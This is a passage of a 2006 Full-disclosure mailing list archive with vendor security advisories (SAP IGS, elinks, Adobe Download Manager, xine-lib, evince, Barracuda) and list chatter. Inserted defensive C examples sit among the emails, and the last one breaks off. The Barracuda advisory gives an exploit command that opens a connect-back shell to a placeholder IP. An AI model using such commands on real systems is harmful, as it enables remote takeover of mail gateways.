"The IGS provides a server architecture where data from an SAP System or other sources can be used to generate graphical or non-graphical output."

It is important to note that IGS is installed and activated by default with the Web Application Server (versions >= 6.30).

Vulnerability Description:
==========================
Undocumented features have been discovered in the SAP IGS service, some of which may signify security risks.

Technical Details:
==================
Technical details will be released three months after publication of this pre-advisory. This was agreed upon with SAP to allow their customers to upgrade affected software prior to technical knowledge being publicly available.

Impact:
=======
Successful exploitation of this vulnerability allows an attacker to remotely shut down the SAP IGS service, access configuration files and perform unauthorized actions over service deployment.

Solutions:
==========
SAP has released patches that disable the default-enabled access to the service HTTP interface. Besides, some commands have been disabled. Affected customers should apply the patches immediately.

More information can be found in SAP Notes 959358 and 965201.

Vendor Response:
================
* 06/02/2006: Initial Vendor Contact.
* 06/09/2006: Vendor Confirmed Vulnerability.
* 07/03/2006: Vendor Releases Update for version 6.40.
* 07/13/2006: Vendor Releases Update for version 7.00.
* 10/08/2006: Vendor Confirmed Solution.
* 12/05/2006: Pre-Advisory Public Disclosure.

Special Thanks:
===============
Thanks go to Carlos Diaz and Victor Montero.

Contact Information:
====================
For more information regarding the vulnerability feel free to contact the author at mnunez {at} cybsec.com.
Please bear in mind that technical details will be disclosed to the general public three months after the release of this pre-advisory.

For more information regarding CYBSEC: www.cybsec.com

(c) 2006 - CYBSEC S.A. Security Systems

From mnunez at cybsec.com Tue Dec 5 18:32:45 2006
From: mnunez at cybsec.com (=?ISO-8859-1?Q?Mariano_Nu=F1ez_Di_Croce?=)
Date: Tue, 05 Dec 2006 15:32:45 -0300
Subject: [Full-disclosure] CYBSEC - Security Pre-Advisory: SAP Internet Graphics Service (IGS) Remote Arbitrary File Removal
Message-ID: <4575BB4D.30507@cybsec.com>

(The following pre-advisory is also available in PDF format for download at: http://www.cybsec.com/vuln/CYBSEC-Security_Pre-Advisory_SAP_IGS_Remote_Arbitrary_File_Removal.pdf )

CYBSEC S.A.
www.cybsec.com

Pre-Advisory Name: SAP Internet Graphics Service (IGS) Remote Arbitrary File Removal
==================

Vulnerability Class: Path Traversal
====================

Release Date: 12/05/2006
=============

Affected Applications:
======================
* SAP IGS 6.40 Patchlevel <= 16
* SAP IGS 7.00 Patchlevel <= 6

Affected Platforms:
===================
* AIX 64 bits
* HP-UX on IA64 64bit
* HP-UX on PA-RISC 64bit
* Linux on IA32 32bit
* Linux on IA64 64bit
* Linux on Power 64bit
* Linux on x86_64 64bit
* Linux on zSeries 64bit
* OS/400 V5R2M0
* Solaris on SPARC 64bit
* TRU64 64bit
* Windows Server on IA32 32bit
* Windows Server on IA64 64bit
* Windows Server on x64 64bit

Local / Remote: Remote
===============

Severity: High
=========

Author: Mariano Nuñez Di Croce
=======

Vendor Status:
==============
* Confirmed, update released.

Reference to Vulnerability Disclosure Policy:
=============================================
http://www.cybsec.com/vulnerability_policy.pdf

Product Overview:
==================
"The IGS provides a server architecture where data from an SAP System or other sources can be used to generate graphical or non-graphical output."
It is important to note that IGS is installed and activated by default with the Web Application Server (versions >= 6.30).

Vulnerability Description:
==========================
A specially crafted HTTP request can remove any file located in the SAP IGS file-system.

Technical Details:
==================
Technical details will be released three months after publication of this pre-advisory. This was agreed upon with SAP to allow their customers to upgrade affected software prior to technical knowledge being publicly available.

Impact:
=======
Under UNIX systems, successful exploitation of this vulnerability may allow an attacker to remotely remove files existing on the SAP IGS file-system. These files must have write permission for the SAP System Administrator account (adm).

Under Microsoft Windows systems, successful exploitation of this vulnerability may allow an attacker to remove any files existing on the SAP IGS file-system.

Solutions:
==========
SAP has released patches to address this vulnerability. Affected customers should apply the patches immediately.

Vendor Response:
================
* 11/03/2006: Initial Vendor Contact.
* 11/06/2006: Vendor Confirmed Vulnerability.
* 11/29/2006: Vendor Releases Update for version 6.40.
* 11/29/2006: Vendor Releases Update for version 7.00.
* 12/05/2006: Pre-Advisory Public Disclosure.

Special Thanks:
===============
Thanks go to Carlos Diaz and Victor Montero.

Contact Information:
====================
For more information regarding the vulnerability feel free to contact the author at mnunez {at} cybsec.com.

Please bear in mind that technical details will be disclosed to the general public three months after the release of this pre-advisory.

For more information regarding CYBSEC: www.cybsec.com

(c) 2006 - CYBSEC S.A.
Security Systems

From jmm at debian.org Tue Dec 5 19:50:15 2006
From: jmm at debian.org (Moritz Muehlenhoff)
Date: Tue, 5 Dec 2006 20:50:15 +0100
Subject: [Full-disclosure] [SECURITY] [DSA 1228-1] New elinks packages fix arbitrary shell command execution
Message-ID: <20061205195015.GA3531@galadriel.inutil.org>

--------------------------------------------------------------------------
Debian Security Advisory DSA 1228-1                    security at debian.org
http://www.debian.org/security/                             Moritz Muehlenhoff
December 5th, 2006                      http://www.debian.org/security/faq
--------------------------------------------------------------------------

Package        : elinks
Vulnerability  : insufficient escaping
Problem-Type   : remote
Debian-specific: no
CVE ID         : CVE-2006-5925
Debian Bug     : 399188

Teemu Salmela discovered that the elinks character mode web browser performs insufficient sanitising of smb:// URIs, which might lead to the execution of arbitrary shell commands.

For the stable distribution (sarge) this problem has been fixed in version 0.10.4-7.1.

For the upcoming stable distribution (etch) this problem has been fixed in version 0.11.1-1.2.

For the unstable distribution (sid) this problem has been fixed in version 0.11.1-1.2.

We recommend that you upgrade your elinks package.

Upgrade Instructions
--------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the footer to the proper configuration.
Debian GNU/Linux 3.1 alias sarge
--------------------------------
These files will probably be moved into the stable distribution on its next update.

For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce at lists.debian.org
Package info: `apt-cache show ' and http://packages.debian.org/

From digital.richard at gmail.com Tue Dec 5 17:24:21 2006
From: digital.richard at gmail.com (richard cassidy)
Date: Tue, 5 Dec 2006 12:24:21 -0500
Subject: [Full-disclosure] BIOS Flash erases all prior passwords on Acer Aspire 5102WLMi
Message-ID: <37c3b2d20612050924k4ab53e2dhf46bfff770271342@mail.gmail.com>

Flashing the bios on Acer Aspire 5102WLMi will erase all passwords previously set. This is obviously a bug! All passwords should not be wiped out with a bios flash (or at least they weren't on a Dell). Or, if they are, it should be stated up front so the passwords can be set again once the bios is "updated".

https://www.synapsenow.com/synapse/data/7117/documents/AS31-51-5110_Flash_v200.zip

If you forget the bios password, they require the computer to be mailed to them; then they charge $100USD (citing labor & security). The workaround they don't tell you about is to download the bios flasher and update your bios.
I tried contacting Acer about this bug and could not reach (was not transferred to) the proper people; I've had teeth pulled that went better than trying to inform Acer.

From tyoptyop at gmail.com Tue Dec 5 21:37:36 2006
From: tyoptyop at gmail.com (Tyop?)
Date: Tue, 5 Dec 2006 22:37:36 +0100
Subject: [Full-disclosure] BIOS Flash erases all prior passwords on Acer Aspire 5102WLMi
In-Reply-To: <37c3b2d20612050924k4ab53e2dhf46bfff770271342@mail.gmail.com>
References: <37c3b2d20612050924k4ab53e2dhf46bfff770271342@mail.gmail.com>
Message-ID: <985b1a3d0612051337j294121a5v479235d68b6e0158@mail.gmail.com>

On 12/5/06, richard cassidy wrote:
> Flashing the bios on Acer Aspire 5102WLMi will erase all passwords
> previously set. This is obviously a bug! All passwords should not be
> wiped out with a bios flash (or at least they weren't on a Dell). Or,
> if they are, it should be stated up front so the passwords can be set
> again once the bios is "updated".

Flashing the bios will erase all data.
It's a feature, not a bug.

--
Tyop?

From Valdis.Kletnieks at vt.edu Tue Dec 5 21:53:42 2006
From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu)
Date: Tue, 05 Dec 2006 16:53:42 -0500
Subject: [Full-disclosure] BIOS Flash erases all prior passwords on Acer Aspire 5102WLMi
In-Reply-To: Your message of "Tue, 05 Dec 2006 22:37:36 +0100." <985b1a3d0612051337j294121a5v479235d68b6e0158@mail.gmail.com>
References: <37c3b2d20612050924k4ab53e2dhf46bfff770271342@mail.gmail.com> <985b1a3d0612051337j294121a5v479235d68b6e0158@mail.gmail.com>
Message-ID: <200612052153.kB5LrgTK002943@turing-police.cc.vt.edu>

On Tue, 05 Dec 2006 22:37:36 +0100, Tyop? said:
> On 12/5/06, richard cassidy wrote:
> > Flashing the bios on Acer Aspire 5102WLMi will erase all passwords
> > previously set. This is obviously a bug! All passwords should not be
> > wiped out with a bios flash (or at least they weren't on a Dell). Or,
> > if they are, it should be stated up front so the passwords can be set
> > again once the bios is "updated".
>
> Flashing the bios will erase all data.

So the big question becomes - on an Acer, are the passwords stored in the BIOS flash memory (in which case, having them evaporate on a BIOS flash is reasonable), or are they on the NVRAM chip, in which case it's a bug/misfeature?

From endrazine at gmail.com Tue Dec 5 22:49:44 2006
From: endrazine at gmail.com (endrazine)
Date: Tue, 05 Dec 2006 23:49:44 +0100
Subject: [Full-disclosure] BIOS Flash erases all prior passwords on Acer Aspire 5102WLMi
In-Reply-To: <985b1a3d0612051337j294121a5v479235d68b6e0158@mail.gmail.com>
References: <37c3b2d20612050924k4ab53e2dhf46bfff770271342@mail.gmail.com> <985b1a3d0612051337j294121a5v479235d68b6e0158@mail.gmail.com>
Message-ID: <4575F788.6050809@gmail.com>

Tyop? wrote:
> Flashing the bios will erase all data.
> It's a feature, not a bug.
>

Bios passwords are stored on the CMOS, not the Rom itself, so no, it doesn't have to be. On the other side, if you can flash your ROM, you have iopl(3) hence root privileges or at least enough privileges to get those passwords back (1). So that's really no big deal.

Regards,

endrazine-

(1) http://packetstorm.linuxsecurity.com/papers/password/Bios.Information.Leakage.txt

side note: I think you both know nothing. Sadly, giving non technical _opinions_ has become the main source of postings on this list.
From endrazine at gmail.com Tue Dec 5 23:02:10 2006
From: endrazine at gmail.com (endrazine)
Date: Wed, 06 Dec 2006 00:02:10 +0100
Subject: [Full-disclosure] BIOS Flash erases all prior passwords on Acer Aspire 5102WLMi
In-Reply-To: <4575F788.6050809@gmail.com>
References: <37c3b2d20612050924k4ab53e2dhf46bfff770271342@mail.gmail.com> <985b1a3d0612051337j294121a5v479235d68b6e0158@mail.gmail.com> <4575F788.6050809@gmail.com>
Message-ID: <4575FA72.7010703@gmail.com>

endrazine wrote:

Just so you know: most Bios settings are stored on the Cmos, so if you can flash the Rom, you have ioperms at the very least on Cmos i/o ports, so you can reset the whole Cmos anyway.

endrazine-

From Advisories at eeye.com Wed Dec 6 01:28:36 2006
From: Advisories at eeye.com (eEye Advisories)
Date: Tue, 5 Dec 2006 17:28:36 -0800
Subject: [Full-disclosure] EEYE: Adobe Download Manager AOM Stack Buffer Overflow Vulnerability
Message-ID:

eEye Research - http://research.eeye.com

Adobe Download Manager AOM Stack Buffer Overflow Vulnerability

Release Date:     December 5, 2006
Date Reported:    November 10, 2006
Severity:         High (Code Execution)
Systems Affected: Adobe Download Manager 2.1.x and earlier

Overview:

eEye Digital Security has discovered a stack buffer overflow in Adobe Download Manager, a utility typically installed for the purpose of downloading Adobe software such as Adobe (Acrobat) Reader. By opening a malicious AOM file, a user's system may be compromised by arbitrary code within the file, which executes with the privileges of that user.

A web-based attack conducted through Internet Explorer may succeed without the use of ActiveX or scripting, and without any additional user interaction other than viewing a web page, if the web server indicates a Content-Type of "application/aom" when serving up the malicious AOM file. In such a case, an ".aom" file extension is not required.
Technical Details:

AdobeDownloadManager.exe is responsible for extracting download instructions from AOM files, which are essentially XML with an appended CRC32 in decimal, and committing the instructions to the file "%APPDATA%\dm.ini" for later processing. For instance, opening the following AOM file:

    WelcomeToMyHumbleAdobe 3871966612

will generate the following lines in "dm.ini":

    [STARTUP]
    Status=IncompleteDownload
    [WelcomeToMyHumbleAdobe]
    StoreID=0
    TransactionID=0

When launched, whether or not it is supplied with an AOM file, AdobeDownloadManager.exe reads the entries from "dm.ini" and handles each described download according to its properties. It begins by reading a list of section names into a 400h-byte buffer using GetPrivateProfileStringA, then copies each section name into a 108h-byte stack buffer using strncpy with a length limit equal to the length of the section name string, so the limit bounds the source rather than the destination. The result is a relatively straightforward stack buffer overflow, with the only complication being the character restrictions.

It should be possible to uninstall Adobe Download Manager, or at least unassociate the AOM file extension and "application/aom" Content-Type in the registry, to defend against this vulnerability. Hopefully users who have been forced to install Adobe Download Manager realized its superfluousness and have already uninstalled it.

Protection:

Retina - Network Security Scanner has been updated to identify this vulnerability.
Blink - Unified Client Security has proactively protected from this vulnerability since its discovery.

Vendor Status:

Adobe has released a patch for this vulnerability which is available at http://www.adobe.com/products/acrobat/acrrmanager.html. The vendor bulletin is available at: http://www.adobe.com/support/security/bulletins/apsb06-19.html.
Credit:

Derek Soeder

Related Links:

Retina - Network Security Scanner - Free Trial:
http://www.eeye.com/html/products/retina/download/index.html

Blink - Unified Client Security Personal - Free For Home Use:
http://www.eeye.com/html/products/blink/personal/download/index.html

Blink - Unified Client Security Professional - Free Trial:
http://www.eeye.com/html/products/blink/download/index.html

Greetings:

Spooky action at a distance. Whoever else found that kernel race condition. Runner-up: Automatically Downloads Malware. (Thanks Daniel!)

Copyright (c) 1998-2006 eEye Digital Security
Permission is hereby granted for the redistribution of this alert electronically. It is not to be edited in any way without express consent of eEye. If you wish to reprint the whole or any part of this alert in any other medium excluding electronic medium, please email alert at eEye.com for permission.

Disclaimer
The information within this paper may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are no warranties, implied or express, with regard to this information. In no event shall the author be liable for any direct or indirect damages whatsoever arising out of or in connection with the use or spread of this information. Any use of this information is at the user's own risk.
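The section-name copy the eEye advisory describes, modelled in C as an added example (not eEye's or Adobe's code): a double-NUL-terminated section list, the unsafe strncpy limit computed rather than performed, and the hardened copy beside it. The buffer sizes are the advisory's 400h and 108h; the sample list, the helper names (build_sample_list, process_section_list, sample_outcome) and the 0x200-byte long name are assumptions.

```c
/* Added example (not eEye's or Adobe's code): models the section-name copy the
 * advisory describes. Names arrive as a double-NUL-terminated list (the layout
 * GetPrivateProfileStringA returns for a NULL key name) and each is copied into
 * a 108h-byte stack buffer. The unsafe pattern passes strlen(name) as strncpy's
 * limit, so the limit bounds the source, not the destination. The overflow is
 * computed here, never performed. */
#include <stdio.h>
#include <string.h>
#include <stddef.h>

#define LIST_BUF_SIZE    0x400  /* the 400h-byte section-list buffer (advisory) */
#define SECTION_BUF_SIZE 0x108  /* the 108h-byte stack buffer (advisory)        */

/* strncpy(dst, name, strlen(name)) writes exactly strlen(name) bytes into dst
 * and never appends a NUL. Returns 1 when that write would run past the
 * 0x108-byte buffer, i.e. when the advisory's overflow occurs; else 0. */
int unsafe_copy_overflows(const char *name)
{
    size_t limit = strlen(name);        /* the "length limit" from the advisory */
    return limit > SECTION_BUF_SIZE;
}

/* Hardened copy: the limit is the destination size, the result is always
 * NUL-terminated, and a name that does not fit is rejected rather than
 * silently truncated. Returns 0 on success, -1 if the name is too long. */
int copy_section_name(char *dst, size_t dstsz, const char *name)
{
    size_t n = strlen(name);
    if (dstsz == 0 || n >= dstsz)
        return -1;
    memcpy(dst, name, n + 1);           /* n + 1 copies the terminating NUL too */
    return 0;
}

/* Walks a double-NUL-terminated section list, attempting the hardened copy for
 * each name. Returns the number accepted; *rejected receives the number that
 * would not fit the stack buffer. */
int process_section_list(const char *list, int *rejected)
{
    char section[SECTION_BUF_SIZE];
    int accepted = 0;
    const char *p;

    *rejected = 0;
    for (p = list; *p != '\0'; p += strlen(p) + 1) {
        if (copy_section_name(section, sizeof section, p) == 0)
            accepted++;
        else
            (*rejected)++;
    }
    return accepted;
}

/* Constructed sample list: the advisory's benign section name followed by a
 * 0x200-byte name, the kind that would overrun a 0x108-byte buffer. Returns the
 * bytes used in buf (including the final NUL), or 0 if buf is too small. */
size_t build_sample_list(char *buf, size_t bufsz)
{
    const char *benign = "WelcomeToMyHumbleAdobe";
    size_t benign_len = strlen(benign), long_len = 0x200;
    size_t need = benign_len + 1 + long_len + 1 + 1;
    char *p = buf;

    if (bufsz < need)
        return 0;
    memcpy(p, benign, benign_len + 1);
    p += benign_len + 1;
    memset(p, 'A', long_len);
    p[long_len] = '\0';
    p += long_len + 1;
    *p = '\0';                          /* second NUL ends the list */
    return need;
}

/* Runs the constructed sample end to end. Returns 1 when exactly one name is
 * accepted, one rejected, and the unsafe pattern overflows on the long name
 * but not on the benign one; 0 otherwise. */
int sample_outcome(void)
{
    char list[LIST_BUF_SIZE];
    int rejected = 0, accepted;
    const char *long_name;

    if (build_sample_list(list, sizeof list) == 0)
        return 0;
    accepted = process_section_list(list, &rejected);
    long_name = list + strlen(list) + 1;
    return accepted == 1 && rejected == 1 &&
           unsafe_copy_overflows(long_name) && !unsafe_copy_overflows(list);
}

int main(void)
{
    printf("sample behaves as the advisory describes: %d\n", sample_outcome());
    return 0;
}
```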
From security at mandriva.com Wed Dec 6 02:42:00 2006
From: security at mandriva.com (security at mandriva.com)
Date: Tue, 5 Dec 2006 19:42:00 -0700
Subject: [Full-disclosure] [ MDKSA-2006:224 ] - Updated xine-lib packages fix buffer overflow vulnerability
Message-ID:

_______________________________________________________________________

Mandriva Linux Security Advisory                         MDKSA-2006:224
http://www.mandriva.com/security/
_______________________________________________________________________

Package : xine-lib
Date    : December 5, 2006
Affected: 2007.0, Corporate 3.0
_______________________________________________________________________

Problem Description:

Buffer overflow in the asmrp_eval function for the Real Media input plugin allows remote attackers to cause a denial of service and possibly execute arbitrary code via a rulebook with a large number of rulematches.

Updated packages have been patched to correct this issue.
_______________________________________________________________________

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6172
_______________________________________________________________________

Updated Packages:
_______________________________________________________________________

To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security.
You can obtain the GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
_______________________________________________________________________

Type Bits/KeyID     Date       User ID
pub  1024D/22458A98 2000-07-10 Mandriva Security Team

From simon at snosoft.com Wed Dec 6 02:52:27 2006
From: simon at snosoft.com (Simon Smith)
Date: Tue, 05 Dec 2006 21:52:27 -0500
Subject: [Full-disclosure] Nmap Online
In-Reply-To: <456BF10D.9080400@matousec.com>
Message-ID:

Why would you do this?

On 11/28/06 3:19 AM, "David Matousek" wrote:

> Hello,
>
> For all Nmap fans, our group have implemented Nmap Online service.
> Its address is http://nmap-online.com/. The interface allows you to perform
> custom
> Nmap scans from our server with only a few limitations in the syntax.
> The service is free and can be used immediately, no registration is required.
>
> Please direct your questions and suggestions to our emails.
>
>
> Regards,

From simon at snosoft.com Wed Dec 6 02:42:11 2006
From: simon at snosoft.com (Simon Smith)
Date: Tue, 05 Dec 2006 21:42:11 -0500
Subject: [Full-disclosure] SSH brute force blocking tool
In-Reply-To: <242a0a8f0611271320q60d1f507hd929961db1decd59@mail.gmail.com>
Message-ID:

You have experience in disarming land mines with a hammer while you are stark naked? Now that's a real man's job!

On 11/27/06 4:20 PM, "Brian Eaton" wrote:

> On 11/27/06, J. Oquendo wrote:
>> There is no hocus pocus here. Look at /var/log/secure and find the term
>> "error retrieving" and print the next line, 13th column. Then sort it and
>> print the unique entries into /tmp/hosts.deny. After you do this, compare
>> /tmp/hosts.deny with /etc/hosts.deny and put the differences not in
>> /etc/hosts.deny
>> into /etc/hosts.deny
>
> Parsing malicious input with shell commands is like disarming land mines with
> a hammer.
>
> And doing it as root? That's like disarming land mines with a hammer while
> you're stark naked.
>
> Regards,
> Brian

From edcarp at gmail.com Wed Dec 6 03:05:51 2006
From: edcarp at gmail.com (Ed Carp)
Date: Tue, 5 Dec 2006 20:05:51 -0700
Subject: [Full-disclosure] Nmap Online
In-Reply-To:
References: <456BF10D.9080400@matousec.com>
Message-ID: <1b0d006c0612051905h39ce657bh214cf60a48be253d@mail.gmail.com>

On 12/5/06, Simon Smith wrote:
> Why would you do this?

Well, for one, sometimes you need to do a port scan when you're not in front of a system that has nmap installed on it. I get a call about once every couple of months, "why can't I get into my email server" that's sitting behind a hardware router with a hole poked in it for port 110. Doing a port scan on the client's IP address ensures that either yes, the port is open or no, it's not. If it's open then I can proceed with my troubleshooting - if not, I know where to look for the problem.
From kees at ubuntu.com Wed Dec 6 03:23:27 2006
From: kees at ubuntu.com (Kees Cook)
Date: Tue, 5 Dec 2006 19:23:27 -0800
Subject: [Full-disclosure] [USN-390-2] evince vulnerability
Message-ID: <20061206032327.GJ6550@outflux.net>

===========================================================
Ubuntu Security Notice USN-390-2             December 06, 2006
evince vulnerability
CVE-2006-5864
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 5.10
Ubuntu 6.06 LTS
Ubuntu 6.10

This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the following package versions:

Ubuntu 5.10:
  evince  0.4.0-0ubuntu4.3

Ubuntu 6.06 LTS:
  evince  0.5.2-0ubuntu3.2

Ubuntu 6.10:
  evince  0.6.1-0ubuntu1.2

In general, a standard system upgrade is sufficient to effect the necessary changes.

Details follow:

USN-390-1 fixed a vulnerability in evince. The original fix did not fully solve the problem, allowing for a denial of service in certain situations.

Original advisory details:

  A buffer overflow was discovered in the PostScript processor included in evince. By tricking a user into opening a specially crafted PS file, an attacker could crash evince or execute arbitrary code with the user's privileges.
From full-disclosure3 at pchandyman.com.au Wed Dec 6 03:45:39 2006
From: full-disclosure3 at pchandyman.com.au (Greg)
Date: Wed, 6 Dec 2006 14:45:39 +1100
Subject: [Full-disclosure] Nmap Online
In-Reply-To: <1b0d006c0612051905h39ce657bh214cf60a48be253d@mail.gmail.com>
Message-ID:

> -----Original Message-----
> From: Ed Carp [mailto:edcarp at gmail.com]
> Sent: Wednesday, 6 December 2006 2:06 PM
> To: full-disclosure at lists.grok.org.uk
> Cc: David Matousek
> Subject: Re: [Full-disclosure] Nmap Online
>
> On 12/5/06, Simon Smith wrote:
>
> > Why would you do this?
>
> Well, for one, sometimes you need to do a port scan when
> you're not in front of a system that has nmap installed on
> it. I get a call about once every couple of months, "why
> can't I get into my email server" that's sitting behind a
> hardware router with a hole poked in it for port 110. Doing
> a port scan on the client's IP address ensures that either
> yes, the port is open or no, it's not. If it's open then I
> can proceed with my troubleshooting - if not, I know where to
> look for the problem.
>

I don't wish to upset anyone but that answer has to be the craziest FIRST "port of call" approach I have seen used. I get plenty of those sorts of calls. I take about 30 seconds time on the phone for almost all of them. I say "Pull the power plug out of the router. Wait 10 seconds, plug it back in and wait another 10 seconds. OK, try now" and almost all of them report it works well. So why would I need and how could I use Nmap online to tell me the router went crazy and locked up? Besides, wouldn't it be just as easy to use the Nmap sitting on my computer if I decided I needed to use it?

Greg.
From jean-sebastien at guay-leroux.com Wed Dec 6 04:48:05 2006
From: jean-sebastien at guay-leroux.com (Jean-Sébastien Guay-Leroux)
Date: Tue, 05 Dec 2006 23:48:05 -0500
Subject: [Full-disclosure] Barracuda Convert-UUlib library buffer overflow leads to remote compromise
Message-ID: <45764B85.40707@guay-leroux.com>

Topic:            Barracuda Convert-UUlib library buffer overflow leads to remote compromise
Announced:        2006-12-05
Product:          Barracuda Spam Firewall
Vendor:           http://www.barracudanetworks.com/
Impact:           Remote shell access
Affected product: Barracuda Spam Firewall with firmware < 3.3.15.026 AND virus definition < 2.0.325
Credits:          Jean-Sébastien Guay-Leroux
CVE ID:           CVE-2005-1349

I. BACKGROUND

The Barracuda Spam Firewall is an integrated hardware and software solution for complete protection of your email server. It provides a powerful, easy to use, and affordable solution to eliminating spam and virus from your organization by providing the following protection:

* Anti-spam
* Anti-virus
* Anti-spoofing
* Anti-phishing
* Anti-spyware (Attachments)
* Denial of Service

II. DESCRIPTION

In 2005, Mark Martinec and Robert Lewis found a flaw in the Convert-UUlib library. Few details were published regarding this flaw.

After some research, I found that the flaw was in the part of the code where BinHex files were getting parsed. By supplying an invalid size for the resource fork or data fork in a BinHex file's header, it is possible to create a heap overflow.

By taking advantage of the sequential calls to free(), it's possible to overwrite more than 4 bytes. In fact, we can write a jmpcode in memory that will jump to one of our registers containing the location of our shellcode. By using this technique, the exploit will be much more reliable. You will only need to supply a return location address to the exploit code.

You do NOT need to have remote administration access (on port 8000) for successful exploitation.
For further information about the details of the bugs, check the exploit code.

III. IMPACT

Gain shell access to the remote Barracuda Spam Firewall.

IV. PROOF OF CONCEPT

Using the PIRANA framework, available at http://www.guay-leroux.com , it is possible to test the Barracuda Spam Firewall against the Convert-UUlib vulnerability.

The version 0.3.1 of the PIRANA framework incorporates a new module to exploit the Convert-UUlib library bug. It contains three hardcoded offsets that should reliably exploit every Barracuda Spam Firewall with a firmware below 3.3.15.026 and virus definition below 2.0.325.

By calling PIRANA the way it is described below, you will get a TCP connect back shell on IP address 1.2.3.4 and port 1234:

perl pirana.pl -e 5 -h barracuda.vulnerable.com -a postmaster -s 0 \
    -l 1.2.3.4 -p 1234

V. VERSIONS AFFECTED

This affects firmware releases before versions 3.3.15.026. This is no longer an issue with Barracuda's customers with current Energize Updates, running virus definition 2.0.325, released Nov. 29, 2006. It is recommended that Barracuda's customers upgrade to the latest generally available release.

VI. CREDITS

Mark Martinec and Robert Lewis found the original flaw in Convert-UUlib.

Jean-Sébastien Guay-Leroux conducted further research on the bug and produced an exploitation plugin for the PIRANA framework.

VII. REFERENCES

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1349

VIII. HISTORY

2005-04-26 : Bug is disclosed by Mark Martinec and Robert Lewis.
2006-08-?? : Convert-UUlib module exploit written for PIRANA.
2006-11-28 : Barracuda Networks is notified about the problem.
2006-11-28 : Barracuda Networks acknowledged the problem.
2006-11-29 : Barracuda Networks published a fix.
2006-12-05 : Advisory is disclosed to the public.
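A check for the BinHex header condition the advisory describes, added here as an example that is not Convert-UUlib's or Barracuda's code: it compares the declared data and resource fork sizes against the bytes actually present, and forms the sum in 64 bits so that oversized declarations cannot wrap past a 32-bit comparison. The header layout is assumed from RFC 1741; the sample builder, the constructed file name and the function names are assumptions.

```c
/* Added example (not Convert-UUlib's or Barracuda's code): checks the fork
 * lengths declared in a BinHex 4.0 header against the bytes actually present.
 * Header layout assumed from RFC 1741, for the stream after 6-bit/RLE decoding:
 * 1-byte name length, name, 1-byte version, 4-byte type, 4-byte creator,
 * 2-byte flags, 4-byte data length, 4-byte resource length, 2-byte header
 * CRC; each fork is then followed by its own 2-byte CRC. */
#include <stdint.h>
#include <stddef.h>
#include <string.h>

enum binhex_status {
    BINHEX_OK               =  0,
    BINHEX_TRUNCATED_HEADER = -1,   /* fewer bytes than the fixed header needs */
    BINHEX_BAD_NAME_LEN     = -2,   /* name length outside 1..63               */
    BINHEX_FORK_TOO_LONG    = -3    /* declared forks exceed the bytes present */
};

#define BINHEX_HDR_LEN(n) (1 + (n) + 1 + 4 + 4 + 2 + 4 + 4 + 2)

static uint32_t get_be32(const unsigned char *p)
{ return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) | ((uint32_t)p[2] << 8) | p[3]; }

static void put_be32(unsigned char *p, uint32_t v)
{ p[0] = (unsigned char)(v >> 24); p[1] = (unsigned char)(v >> 16);
  p[2] = (unsigned char)(v >> 8);  p[3] = (unsigned char)v; }

/* Parses the header at buf[0..len) and checks that the declared data and
 * resource forks, each with its 2-byte CRC, fit inside len. The sum is formed
 * in 64 bits so two large 32-bit lengths cannot wrap to a small value and pass.
 * On BINHEX_OK the declared lengths are stored in *data_len and *rsrc_len. */
int binhex_check_forks(const unsigned char *buf, size_t len,
                       uint32_t *data_len, uint32_t *rsrc_len)
{
    size_t name_len, hdr_len;
    const unsigned char *lengths;
    uint32_t dlen, rlen;
    uint64_t need;

    if (len < 1)
        return BINHEX_TRUNCATED_HEADER;
    name_len = buf[0];
    if (name_len == 0 || name_len > 63)
        return BINHEX_BAD_NAME_LEN;
    hdr_len = BINHEX_HDR_LEN(name_len);
    if (len < hdr_len)
        return BINHEX_TRUNCATED_HEADER;
    lengths = buf + 1 + name_len + 1 + 4 + 4 + 2;   /* skip to the length fields */
    dlen = get_be32(lengths);
    rlen = get_be32(lengths + 4);
    need = (uint64_t)hdr_len + dlen + 2 + (uint64_t)rlen + 2;
    if (need > (uint64_t)len)
        return BINHEX_FORK_TOO_LONG;
    *data_len = dlen;
    *rsrc_len = rlen;
    return BINHEX_OK;
}

/* Constructed, already-decoded sample: a header declaring the given fork
 * lengths followed by `present` payload bytes. Returns bytes written, or 0 if
 * out is too small. The header CRC is left zero; it is not checked here. */
size_t build_sample(unsigned char *out, size_t outsz,
                    uint32_t dlen, uint32_t rlen, size_t present)
{
    const char *name = "hello.txt";
    size_t name_len = strlen(name), hdr_len = BINHEX_HDR_LEN(name_len);
    unsigned char *p = out;

    if (outsz < hdr_len + present)
        return 0;
    *p++ = (unsigned char)name_len;
    memcpy(p, name, name_len);  p += name_len;
    *p++ = 0;                                   /* version */
    memcpy(p, "TEXT", 4);       p += 4;         /* type    */
    memcpy(p, "ttxt", 4);       p += 4;         /* creator */
    *p++ = 0; *p++ = 0;                         /* flags   */
    put_be32(p, dlen);          p += 4;
    put_be32(p, rlen);          p += 4;
    *p++ = 0; *p++ = 0;                         /* header CRC placeholder */
    memset(p, 'x', present);
    return hdr_len + present;
}

/* Consistent sample: 5-byte data fork, 3-byte resource fork, both CRCs present. */
int consistent_sample_status(void)
{
    unsigned char buf[128];
    uint32_t d, r;
    size_t n = build_sample(buf, sizeof buf, 5, 3, 5 + 2 + 3 + 2);
    return n ? binhex_check_forks(buf, n, &d, &r) : -99;
}

/* Oversized sample: dlen + rlen wraps to 0x10 in 32-bit arithmetic, so a
 * 32-bit check would accept it against 71 bytes; the 64-bit check rejects it. */
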